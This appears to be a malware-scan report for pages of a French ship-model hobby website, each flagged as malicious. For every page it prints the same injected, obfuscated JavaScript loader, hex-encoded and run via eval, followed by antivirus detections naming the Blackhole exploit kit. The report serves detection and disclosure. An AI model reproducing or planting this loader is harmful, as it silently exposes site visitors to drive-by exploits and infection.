Request | Server response | Status |
http://maquettes.navales.free.fr/ | 200 OK Content-Length: 9696 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/quisuisje.htm | 200 OK Content-Length: 11980 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/maquettesnavales.htm | 200 OK Content-Length: 12533 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/maquettesavions.htm | 200 OK Content-Length: 11540 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/bateauxbois.htm | 200 OK Content-Length: 11531 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/prestige.htm | 200 OK Content-Length: 13590 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/exemplemaquette.htm | 200 OK Content-Length: 33487 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/Exposition.htm | 200 OK Content-Length: 10490 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/restauration.htm | 200 OK Content-Length: 9878 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/tableaux.htm | 200 OK Content-Length: 55291 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/contact.htm | 200 OK Content-Length: 10833 Content-Type: text/html | malicious |
